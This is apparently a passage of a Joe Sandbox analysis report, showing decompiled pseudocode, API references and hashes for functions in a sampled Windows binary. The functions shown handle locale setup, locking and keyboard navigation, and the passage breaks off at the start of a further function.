0x00ca3316
0x00ca331b
0x00ca331e
0x00ca3324
0x00ca3329
0x00ca332e
0x00ca332f
0x00ca3335
0x00ca333a
0x00ca333f
0x00ca3340
0x00ca3346
0x00ca334b
0x00ca3350
0x00ca3351
0x00ca3357
0x00ca335c
0x00ca3361
0x00ca3362
0x00ca3368
0x00ca336d
0x00ca3372
0x00ca3375
0x00ca3378
0x00ca3380
0x00ca338b
0x00ca32c0
0x00ca32c4
0x00ca32d2
0x00ca32d2

APIs

__EH_prolog3.LIBCMT ref: 00CA327A
std::_Lockit::_Lockit.LIBCPMT ref: 00CA3287
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CA32C4

Part of subcall function 00DDE347: _Yarn.LIBCPMT ref: 00DDE366
Part of subcall function 00DDE347: _Yarn.LIBCPMT ref: 00DDE38A

Strings

bad locale name, xrefs: 00CA32D5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: f02641f9badc1cf221e651a1e33ed0053e02f06ca358a628f1d90848c2e41d37
Instruction ID: 3f2749977b2b22471b1497276f73c8d50f0beb20bed0af9dabfe2939fb776cc1
Opcode Fuzzy Hash: f02641f9badc1cf221e651a1e33ed0053e02f06ca358a628f1d90848c2e41d37
Instruction Fuzzy Hash: 21014F70505784CEC721DF79848124AFBE0BF19300B548A2FE19AD7B02D770E604CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 00CE14D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CE14D5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, intOrPtr __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t29;
				void* _t31;

				_t30 = __esi;
				_t27 = __edx;
				_push(0x58);
				E00DDD55F(0xe0885b, __ebx, __edi, __esi);
				_t29 = __ecx;
				_t33 =  *0xe87330;
				if( *0xe87330 != 0) {
					EnterCriticalSection(0xe8733c);
				}
				_push(_t29);
				E00CB9046(0xe8733c, _t31 - 0x64, _t27, _t29, _t30, _t33);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if((E00CB778C(_t29) & 0x10000000) != 0) {
					_t30 =  *((intOrPtr*)( *_t29 + 0x264));
					 *0xe17a64(_t31 - 0x64);
					 *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x264))))();
				}
				if( *0xe87330 != 0) {
					LeaveCriticalSection(0xe8733c);
				}
				E00CB92FC(_t31 - 0x64);
				return E00DDD50E(0xe8733c, _t29, _t30);
			}

0x00ce14d5
0x00ce14d5
0x00ce14d5
0x00ce14dc
0x00ce14e1
0x00ce14e3
0x00ce14ef
0x00ce14f2
0x00ce14f2
0x00ce14f8
0x00ce14fc
0x00ce1501
0x00ce1511
0x00ce1519
0x00ce1521
0x00ce1529
0x00ce1529
0x00ce1532
0x00ce1535
0x00ce1535
0x00ce153e
0x00ce1548

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE14DC
EnterCriticalSection.KERNEL32(00E8733C,00000058), ref: 00CE14F2
LeaveCriticalSection.KERNEL32(00E8733C,?,00000058), ref: 00CE1535

Strings

<s, xrefs: 00CE14EA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$EnterH_prolog3_Leave
String ID: <s
API String ID: 4216991881-2940880691
Opcode ID: 91f3757ae440d3b03eba45546ae8c95526f2b4871edfd9fe9f69aed2a545a509
Instruction ID: 62d3ebf03fb32c830a93bf2b116f9784116983bd461e327236e62c4d07db2dfe
Opcode Fuzzy Hash: 91f3757ae440d3b03eba45546ae8c95526f2b4871edfd9fe9f69aed2a545a509
Instruction Fuzzy Hash: 5CF062315042058BCB05FB65ED997AD33B6AB84701F585059BC56772E1CF348E08DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF400 Relevance: 6.4, APIs: 4, Instructions: 390
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00CCF400(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				char _v13;
				intOrPtr* _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _t127;
				signed int _t129;
				struct HWND__* _t131;
				signed int _t134;
				signed int _t145;
				signed int _t147;
				void* _t166;
				signed int _t172;
				signed int _t197;
				signed int _t199;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				RECT* _t207;
				signed int _t211;
				signed int _t216;
				intOrPtr _t226;
				signed int _t243;
				signed int _t248;
				signed int _t280;
				signed int _t281;
				intOrPtr* _t287;
				intOrPtr* _t291;
				intOrPtr _t293;
				signed int _t297;
				intOrPtr _t302;
				void* _t315;
				intOrPtr _t320;
				void* _t321;
				void* _t322;

				_t218 = __ecx;
				_t215 = __ebx;
				_push(0x14);
				E00DDD52C(0xe09d01, __ebx, __edi, __esi);
				_t280 = __ecx;
				_v20 = __ecx;
				_t274 = 0;
				if( *((intOrPtr*)(__ecx + 0x3ac)) == 0) {
					L62:
					_t124 = E00CB236A(_t215, _t218, __eflags);
					goto L88;
				} else {
					_t293 = _a8;
					_t315 = _t293 - 0x26;
					if(_t315 > 0) {
						_t127 = _t293 - 0x27;
						__eflags = _t127;
						if(__eflags == 0) {
							GetAsyncKeyState(0x11);
							asm("bt ax, 0xf");
							if(__eflags >= 0) {
								_t218 =  *(_t280 + 0x3d8);
								_t274 = 0;
								__eflags = _t218;
								if(_t218 == 0) {
									goto L79;
								} else {
									__eflags =  *(_t218 + 0x5c);
									if( *(_t218 + 0x5c) == 0) {
										goto L79;
									} else {
										__eflags =  *(_t218 + 0x60);
										if( *(_t218 + 0x60) != 0) {
											goto L79;
										} else {
											goto L78;
										}
									}
								}
							} else {
								_t171 =  *((intOrPtr*)(_t280 + 0x358)) + 5;
								goto L10;
							}
						} else {
							_t172 = _t127 - 1;
							__eflags = _t172;
							if(_t172 == 0) {
								L79:
								__eflags =  *(_t280 + 0x3d8) - _t274;
								if(__eflags == 0) {
									goto L40;
								} else {
									GetAsyncKeyState(0x12);
									asm("bt ax, 0xf");
									if(__eflags >= 0) {
										L85:
										_t145 =  *(_t280 + 0x3d8);
										_push(1);
										_push(0);
										_t226 =  *((intOrPtr*)(_t145 + 0x38));
										_t147 =  *((intOrPtr*)(_t145 + 0x3c)) + 2;
										__eflags = _t147;
										goto L86;
									} else {
										__eflags = _t293 - 0x28;
										if(__eflags != 0) {
											goto L85;
										} else {
											 *0xe17a64( &_v28);
											 *((intOrPtr*)( *((intOrPtr*)( *( *(_t280 + 0x3d8)) + 0x24))))();
											_v4 = 2;
											E00CAFF34( *((intOrPtr*)(E00CACEEE(_t215,  *(_t280 + 0x3d8),  *((intOrPtr*)( *( *(_t280 + 0x3d8)) + 0x24)), __eflags) + 4)));
											_v4 = 3;
											 *0xe17a64(0xffffffff, 0xffffffff);
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x3d8)))) + 0x3c))))();
											 *0xe17a64( &_v32);
											_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x3d8)))) + 0x24))))());
											_v13 = E00CBDEF4( &_v28);
											E00CA2975(_t164, _v32 + 0xfffffff0);
											__eflags = _v13;
											if(__eflags != 0) {
												_t287 = _v20;
												 *0xe17a64( *((intOrPtr*)(_t287 + 0x3d8)));
												 *((intOrPtr*)( *((intOrPtr*)( *_t287 + 0x174))))();
											}
											_t166 = E00CB0895( &_v13, _t274, __eflags);
											_t243 = _v28;
											goto L60;
										}
									}
									goto L88;
								}
							} else {
								_t124 = _t172 - 0x43;
								__eflags = _t124;
								if(_t124 == 0) {
									_t218 =  *(__ecx + 0x3d8);
									__eflags = _t218;
									if(_t218 != 0) {
										__eflags =  *(_t218 + 0x5c);
										if( *(_t218 + 0x5c) != 0) {
											__eflags =  *(_t218 + 0x60);
											if( *(_t218 + 0x60) == 0) {
												__eflags =  *(_t218 + 0x58);
												if( *(_t218 + 0x58) == 0) {
													L78:
													_push(1);
													goto L15;
												}
											}
										}
									}
								} else {
									_t124 = _t124;
									__eflags = _t124;
									if(_t124 == 0) {
										_t218 =  *(__ecx + 0x3d8);
										__eflags = _t218;
										if(_t218 != 0) {
											__eflags =  *(_t218 + 0x5c);
											if( *(_t218 + 0x5c) != 0) {
												__eflags =  *(_t218 + 0x60);
												if( *(_t218 + 0x60) != 0) {
													__eflags =  *(_t218 + 0x58);
													if( *(_t218 + 0x58) == 0) {
														goto L14;
													}
												}
											}
										}
									} else {
										__eflags = _t124 - 6;
										if(__eflags != 0) {
											goto L61;
										} else {
											_t248 =  *(__ecx + 0x3d8);
											__eflags = _t248;
											if(__eflags == 0) {
												goto L61;
											} else {
												__eflags =  *(_t248 + 0x64);
												if(__eflags == 0) {
													goto L61;
												} else {
													 *0xe17a64(_t248, 0);
													__eflags =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x180))))();
													if(__eflags == 0) {
														goto L61;
													} else {
														_t124 =  *(__ecx + 0x3d8);
														_v28 = _t124;
														__eflags =  *(_t124 + 0x2c) & 0x00000002;
														if(__eflags != 0) {
															 *0xe17a64( &_v24);
															 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x24))))();
															_v4 = _v4 & 0x00000000;
															E00CAFF34( *((intOrPtr*)(E00CACEEE(__ebx, __ecx,  *((intOrPtr*)( *_t124 + 0x24)), __eflags) + 4)));
															_v4 = 1;
															 *0xe17a64(0xffffffff, 0xffffffff);
															 *((intOrPtr*)( *((intOrPtr*)( *( *(_t280 + 0x3d8)) + 0x3c))))();
															 *0xe17a64( &_v28);
															_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x3d8)))) + 0x24))))());
															_v13 = E00CBDEF4( &_v24);
															E00CA2975(_t192, _v28 + 0xfffffff0);
															__eflags = _v13;
															if(__eflags != 0) {
																_t291 = _v20;
																 *0xe17a64( *((intOrPtr*)(_t291 + 0x3d8)));
																 *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x174))))();
															}
															_t166 = E00CB0895( &_v13, _t274, __eflags);
															_t243 = _v24;
															L60:
															_t124 = E00CA2975(_t166, _t243 - 0x10);
														}
													}
												}
											}
										}
									}
								}
								goto L88;
							}
						}
					} else {
						if(_t315 == 0) {
							L39:
							_t197 =  *(_t280 + 0x3d8);
							__eflags = _t197;
							if(_t197 != 0) {
								_t226 =  *((intOrPtr*)(_t197 + 0x38));
								_push(1);
								_t147 =  *((intOrPtr*)(_t197 + 0x34)) - 2;
								_push(_t274);
								L86:
								_push(_t147);
								_push(_t226 - 1);
								_t297 = E00CCDF11(_t280, _t274);
								__eflags = _t297;
								if(_t297 != 0) {
									E00CD1624(_t280, _t297, 1);
									_t124 = E00CCDC39(_t280, _t274, _t297, 0);
								}
								goto L88;
							} else {
								goto L40;
							}
						} else {
							_t293 = _t293 - 0x21;
							if(_t293 == 0) {
								_t199 =  *(__ecx + 0x3d8);
								__eflags = _t199;
								if(_t199 == 0) {
									goto L40;
								} else {
									__eflags =  *(__ecx + 0x364);
									if( *(__ecx + 0x364) == 0) {
										goto L40;
									} else {
										E00CCDC39(__ecx, 0, _t199, 0);
										_t293 = 0;
										_t218 = __ecx;
										_t203 = E00CCDF11(__ecx,  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x38)) - 1,  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x38)) - 1,  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x34)) -  *(__ecx + 0x354) *  *(__ecx + 0x364), 0, 1);
										__eflags = _t203;
										if(_t203 == 0) {
											_t274 = 0;
											goto L40;
										} else {
											E00CD1624(__ecx, _t203, 1);
											_push(0);
											_push(0);
											_push(2);
											goto L46;
										}
									}
								}
							} else {
								_t293 = _t293 - 1;
								if(_t293 == 0) {
									_t205 =  *(__ecx + 0x3d8);
									__eflags = _t205;
									if(_t205 != 0) {
										__eflags =  *(__ecx + 0x364);
										if( *(__ecx + 0x364) == 0) {
											goto L26;
										} else {
											E00CCDC39(__ecx, 0, _t205, 0);
											_t293 = 0;
											_t218 = __ecx;
											_t211 = E00CCDF11(__ecx,  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x38)) - 1,  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x38)) - 1,  *(__ecx + 0x354) *  *(__ecx + 0x364) +  *((intOrPtr*)( *(__ecx + 0x3d8) + 0x34)), 0, 1);
											__eflags = _t211;
											if(_t211 == 0) {
												_t274 = 0;
												__eflags = 0;
												goto L26;
											} else {
												E00CD1624(__ecx, _t211, 1);
												_push(0);
												_push(0);
												_push(3);
												goto L46;
											}
										}
									} else {
										__eflags =  *(__ecx + 0x304);
										if( *(__ecx + 0x304) == 0) {
											_t129 =  *(__ecx + 0x3a4);
										} else {
											_t129 =  *(__ecx + 0x3c0);
										}
										__eflags = _t129;
										if(__eflags == 0) {
											goto L89;
										} else {
											goto L45;
										}
									}
								} else {
									_t293 = _t293 - 1;
									if(_t293 == 0) {
										L26:
										__eflags =  *((intOrPtr*)(_t280 + 0x304)) - _t274;
										if( *((intOrPtr*)(_t280 + 0x304)) == _t274) {
											_t206 =  *(_t280 + 0x3a8);
										} else {
											_t206 =  *(_t280 + 0x3c4);
										}
										while(1) {
											__eflags = _t206;
											if(__eflags == 0) {
												goto L89;
											}
											_t207 =  *((intOrPtr*)(_t206 + 8));
											__eflags =  *((intOrPtr*)(_t207 + 0xd8)) - _t274;
											if( *((intOrPtr*)(_t207 + 0xd8)) != _t274) {
												__eflags =  *((intOrPtr*)(_t207 + 0x60)) - _t274;
												if( *((intOrPtr*)(_t207 + 0x60)) == _t274) {
													goto L33;
												} else {
													_t206 =  *(_t207 + 0xd4);
													continue;
												}
											} else {
												L33:
												E00CD1624(_t280, _t207, 1);
												_push(0);
												_push(0);
												_push(7);
												goto L46;
											}
											goto L100;
										}
										goto L89;
									} else {
										_t293 = _t293 - 1;
										if(_t293 == 0) {
											L40:
											__eflags =  *((intOrPtr*)(_t280 + 0x304)) - _t274;
											if( *((intOrPtr*)(_t280 + 0x304)) == _t274) {
												_t129 =  *(_t280 + 0x3a4);
											} else {
												_t129 =  *(_t280 + 0x3c0);
											}
											__eflags = _t129;
											if(__eflags == 0) {
												L89:
												E00CAA4E7(_t215, _t218, _t280, _t293, __eflags);
												asm("int3");
												_push(_t218);
												_push(_t215);
												_t216 = _v0;
												_push(_t280);
												_t281 = _t218;
												__eflags = _t216;
												if(_t216 != 0) {
													_t131 =  *(_t216 + 0x20);
												} else {
													_t131 = 0;
												}
												__eflags = IsChild( *(_t281 + 0x20), _t131);
												if(__eflags == 0) {
													_t134 =  *(_t281 + 0x3d8);
													_v8 = _t134;
													_push(_t293);
													__eflags = _t134;
													if(_t134 == 0) {
														L96:
														 *0xe17a64(1);
														 *((intOrPtr*)( *((intOrPtr*)( *_t281 + 0x188))))();
														 *(_t281 + 0x390) =  *(_t281 + 0x390) & 0x00000000;
														_t222 =  *(_t281 + 0x3d8);
														__eflags =  *(_t281 + 0x3d8);
														if(__eflags != 0) {
															E00CD11AD(_t222);
														}
													} else {
														 *0xe17a64(_t216);
														__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t134 + 0x8c))))();
														if(__eflags != 0) {
															goto L96;
														}
													}
												}
												return E00CB236A(_t216, _t281, __eflags);
											} else {
												_t218 = _t280;
												L45:
												E00CD1624(_t218,  *((intOrPtr*)(_t129 + 8)), 1);
												_push(0);
												_push(0);
												_push(6);
												L46:
												_t124 = E00CD0759(_t280, _t322);
												goto L88;
											}
										} else {
											_t293 = _t293 - 1;
											_t320 = _t293;
											if(_t320 != 0) {
												L61:
												_t218 = _t280;
												goto L62;
											} else {
												GetAsyncKeyState(0x11);
												asm("bt ax, 0xf");
												if(_t320 >= 0) {
													_t218 =  *(_t280 + 0x3d8);
													_t274 = 0;
													__eflags = _t218;
													if(_t218 == 0) {
														goto L39;
													} else {
														__eflags =  *(_t218 + 0x5c);
														if( *(_t218 + 0x5c) == 0) {
															goto L39;
														} else {
															__eflags =  *(_t218 + 0x60);
															if( *(_t218 + 0x60) == 0) {
																goto L39;
															} else {
																L14:
																_push(_t274);
																L15:
																_t124 = E00CCDD70(_t218);
																goto L88;
															}
														}
													}
												} else {
													_t171 =  *((intOrPtr*)(_t280 + 0x358)) - 5;
													_t321 =  *((intOrPtr*)(_t280 + 0x358)) - 5;
													L10:
													_t302 =  *((intOrPtr*)(_t280 + 0x39c));
													 *((intOrPtr*)(_t280 + 0x39c)) = 1;
													_t124 = E00CD1D16(_t215, _t280, _t274, _t280, _t302, _t321, _t171);
													 *((intOrPtr*)(_t280 + 0x39c)) = _t302;
													L88:
													return E00DDD4FA(_t124);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L100:
			}

0x00ccf400
0x00ccf400
0x00ccf400
0x00ccf407
0x00ccf40c
0x00ccf40e
0x00ccf411
0x00ccf419
0x00ccf774
0x00ccf774
0x00000000
0x00ccf41f
0x00ccf41f
0x00ccf422
0x00ccf425
0x00ccf643
0x00ccf643
0x00ccf646
0x00ccf7d9
0x00ccf7df
0x00ccf7e4
0x00ccf7f4
0x00ccf7fa
0x00ccf7fc
0x00ccf7fe
0x00000000
0x00ccf800
0x00ccf800
0x00ccf803
0x00000000
0x00ccf805
0x00ccf805
0x00ccf808
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccf808
0x00ccf803
0x00ccf7e6
0x00ccf7ec
0x00000000
0x00ccf7ec
0x00ccf64c
0x00ccf64c
0x00ccf64c
0x00ccf64f
0x00ccf811
0x00ccf811
0x00ccf817
0x00000000
0x00ccf81d
0x00ccf81f
0x00ccf825
0x00ccf82a
0x00ccf8f5
0x00ccf8f5
0x00ccf8fb
0x00ccf8fd
0x00ccf8ff
0x00ccf905
0x00ccf905
0x00000000
0x00ccf830
0x00ccf830
0x00ccf833
0x00000000
0x00ccf839
0x00ccf84a
0x00ccf852
0x00ccf854
0x00ccf863
0x00ccf86f
0x00ccf880
0x00ccf888
0x00ccf89e
0x00ccf8a8
0x00ccf8ba
0x00ccf8bd
0x00ccf8c2
0x00ccf8c6
0x00ccf8c8
0x00ccf8db
0x00ccf8e3
0x00ccf8e3
0x00ccf8e8
0x00ccf8ed
0x00000000
0x00ccf8ed
0x00ccf833
0x00000000
0x00ccf82a
0x00ccf655
0x00ccf655
0x00ccf655
0x00ccf658
0x00ccf7ac
0x00ccf7b2
0x00ccf7b4
0x00ccf7ba
0x00ccf7bd
0x00ccf7c3
0x00ccf7c6
0x00ccf7cc
0x00ccf7cf
0x00ccf80a
0x00ccf80a
0x00000000
0x00ccf80a
0x00ccf7cf
0x00ccf7c6
0x00ccf7bd
0x00ccf65e
0x00ccf65f
0x00ccf65f
0x00ccf662
0x00ccf77e
0x00ccf784
0x00ccf786
0x00ccf78c
0x00ccf78f
0x00ccf795
0x00ccf798
0x00ccf79e
0x00ccf7a1
0x00000000
0x00ccf7a7
0x00ccf7a1
0x00ccf798
0x00ccf78f
0x00ccf668
0x00ccf668
0x00ccf66b
0x00000000
0x00ccf671
0x00ccf671
0x00ccf677
0x00ccf679
0x00000000
0x00ccf67f
0x00ccf67f
0x00ccf682
0x00000000
0x00ccf688
0x00ccf694
0x00ccf69e
0x00ccf6a0
0x00000000
0x00ccf6a6
0x00ccf6a6
0x00ccf6ac
0x00ccf6af
0x00ccf6b3
0x00ccf6c4
0x00ccf6cd
0x00ccf6cf
0x00ccf6db
0x00ccf6ea
0x00ccf6f5
0x00ccf6fd
0x00ccf713
0x00ccf71d
0x00ccf72f
0x00ccf732
0x00ccf737
0x00ccf73b
0x00ccf73d
0x00ccf750
0x00ccf758
0x00ccf758
0x00ccf75d
0x00ccf762
0x00ccf765
0x00ccf768
0x00ccf768
0x00ccf6b3
0x00ccf6a0
0x00ccf682
0x00ccf679
0x00ccf66b
0x00ccf662
0x00000000
0x00ccf658
0x00ccf64f
0x00ccf42b
0x00ccf42b
0x00ccf5e9
0x00ccf5e9
0x00ccf5ef
0x00ccf5f1
0x00ccf630
0x00ccf636
0x00ccf638
0x00ccf63b
0x00ccf908
0x00ccf909
0x00ccf90a
0x00ccf912
0x00ccf914
0x00ccf916
0x00ccf91d
0x00ccf927
0x00ccf927
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccf431
0x00ccf431
0x00ccf434
0x00ccf58e
0x00ccf594
0x00ccf596
0x00000000
0x00ccf598
0x00ccf598
0x00ccf59e
0x00000000
0x00ccf5a0
0x00ccf5a2
0x00ccf5ad
0x00ccf5ca
0x00ccf5cc
0x00ccf5d1
0x00ccf5d3
0x00ccf5e5
0x00000000
0x00ccf5d5
0x00ccf5da
0x00ccf5df
0x00ccf5e0
0x00ccf5e1
0x00000000
0x00ccf5e1
0x00ccf5d3
0x00ccf59e
0x00ccf43a
0x00ccf43a
0x00ccf43d
0x00ccf4c6
0x00ccf4cc
0x00ccf4ce
0x00ccf4f3
0x00ccf4f9
0x00000000
0x00ccf4fb
0x00ccf4fd
0x00ccf508
0x00ccf522
0x00ccf525
0x00ccf52a
0x00ccf52c
0x00ccf541
0x00ccf541
0x00000000
0x00ccf52e
0x00ccf533
0x00ccf538
0x00ccf539
0x00ccf53a
0x00000000
0x00ccf53a
0x00ccf52c
0x00ccf4d0
0x00ccf4d0
0x00ccf4d6
0x00ccf4e0
0x00ccf4d8
0x00ccf4d8
0x00ccf4d8
0x00ccf4e6
0x00ccf4e8
0x00000000
0x00ccf4ee
0x00000000
0x00ccf4ee
0x00ccf4e8
0x00ccf443
0x00ccf443
0x00ccf446
0x00ccf543
0x00ccf543
0x00ccf549
0x00ccf553
0x00ccf54b
0x00ccf54b
0x00ccf54b
0x00ccf566
0x00ccf566
0x00ccf568
0x00000000
0x00000000
0x00ccf56e
0x00ccf571
0x00ccf577
0x00ccf55b
0x00ccf55e
0x00000000
0x00ccf560
0x00ccf560
0x00000000
0x00ccf560
0x00ccf579
0x00ccf579
0x00ccf57e
0x00ccf583
0x00ccf585
0x00ccf587
0x00000000
0x00ccf587
0x00000000
0x00ccf577
0x00000000
0x00ccf44c
0x00ccf44c
0x00ccf44f
0x00ccf5f3
0x00ccf5f3
0x00ccf5f9
0x00ccf603
0x00ccf5fb
0x00ccf5fb
0x00ccf5fb
0x00ccf609
0x00ccf60b
0x00ccf934
0x00ccf934
0x00ccf939
0x00ccf93d
0x00ccf93e
0x00ccf93f
0x00ccf942
0x00ccf943
0x00ccf945
0x00ccf947
0x00ccf94d
0x00ccf949
0x00ccf949
0x00ccf949
0x00ccf95a
0x00ccf95c
0x00ccf95e
0x00ccf964
0x00ccf967
0x00ccf968
0x00ccf96a
0x00ccf986
0x00ccf992
0x00ccf99a
0x00ccf99c
0x00ccf9a3
0x00ccf9a9
0x00ccf9ab
0x00ccf9ad
0x00ccf9ad
0x00ccf96c
0x00ccf977
0x00ccf982
0x00ccf984
0x00000000
0x00000000
0x00ccf984
0x00ccf9b2
0x00ccf9bd
0x00ccf611
0x00ccf611
0x00ccf613
0x00ccf619
0x00ccf61e
0x00ccf620
0x00ccf622
0x00ccf624
0x00ccf626
0x00000000
0x00ccf626
0x00ccf455
0x00ccf455
0x00ccf455
0x00ccf458
0x00ccf772
0x00ccf772
0x00000000
0x00ccf45e
0x00ccf460
0x00ccf466
0x00ccf46b
0x00ccf499
0x00ccf49f
0x00ccf4a1
0x00ccf4a3
0x00000000
0x00ccf4a9
0x00ccf4a9
0x00ccf4ac
0x00000000
0x00ccf4b2
0x00ccf4b2
0x00ccf4b5
0x00000000
0x00ccf4bb
0x00ccf4bb
0x00ccf4bb
0x00ccf4bc
0x00ccf4bc
0x00000000
0x00ccf4bc
0x00ccf4b5
0x00ccf4ac
0x00ccf46d
0x00ccf473
0x00ccf473
0x00ccf476
0x00ccf476
0x00ccf47f
0x00ccf489
0x00ccf48e
0x00ccf92c
0x00ccf931
0x00ccf931
0x00ccf46b
0x00ccf458
0x00ccf44f
0x00ccf446
0x00ccf43d
0x00ccf434
0x00ccf42b
0x00ccf425
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CCF407
GetAsyncKeyState.USER32(00000011), ref: 00CCF460

Part of subcall function 00CD1D16: __EH_prolog3_GS.LIBCMT ref: 00CD1D1D
Part of subcall function 00CD1D16: IsRectEmpty.USER32 ref: 00CD1D38
Part of subcall function 00CD1D16: InvertRect.USER32(?,?), ref: 00CD1D4E
Part of subcall function 00CD1D16: SetRectEmpty.USER32(?), ref: 00CD1D61

GetAsyncKeyState.USER32(00000011), ref: 00CCF7D9
GetAsyncKeyState.USER32(00000012), ref: 00CCF81F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AsyncRectState$Empty$H_prolog3H_prolog3_Invert
String ID:
API String ID: 1053828128-0
Opcode ID: 6757c20238f37303dfd5385480f902a0b4180f1b27040755e27c3039c67a6db5
Instruction ID: b759bc59c614e256b2673894ca95d28dfe0a5d9e7564c01a2138644e8e6e9395
Opcode Fuzzy Hash: 6757c20238f37303dfd5385480f902a0b4180f1b27040755e27c3039c67a6db5
Instruction Fuzzy Hash: 61E19330B00602AFDF19DB68C854FB9B7ABBF45710F18416EE525AB291CB70AE42DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC5F4 Relevance: 6.4, APIs: 4, Instructions: 386
windowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CEC5F4(intOrPtr* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, int _a20) {
				struct HDC__* _v0;
				signed int _v8;
				int _v12;
				struct HICON__* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				int _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				intOrPtr* _v64;
				intOrPtr* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				int _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t148;
				intOrPtr _t150;
				int _t152;
				signed int _t157;
				signed int _t160;
				signed int _t161;
				int _t163;
				long _t165;
				intOrPtr _t179;
				intOrPtr _t183;
				intOrPtr _t186;
				char _t211;
				intOrPtr _t223;
				void* _t234;
				long _t235;
				void* _t236;
				intOrPtr _t256;
				void* _t258;
				intOrPtr* _t260;
				intOrPtr _t261;
				void* _t263;
				int _t264;
				intOrPtr _t265;
				intOrPtr _t275;
				intOrPtr _t277;
				intOrPtr* _t283;
				intOrPtr _t291;
				intOrPtr _t303;
				struct HDC__* _t304;
				intOrPtr _t305;
				int _t306;
				void* _t308;
				int _t310;
				intOrPtr _t313;
				intOrPtr _t315;
				int _t316;
				intOrPtr* _t317;
				void* _t318;
				intOrPtr _t320;
				void* _t323;
				signed int _t326;
				long _t329;
				intOrPtr* _t332;
				int _t334;
				int _t335;
				void* _t338;
				signed int _t346;
				void* _t374;

				_t374 = __fp0;
				_t260 = __ecx;
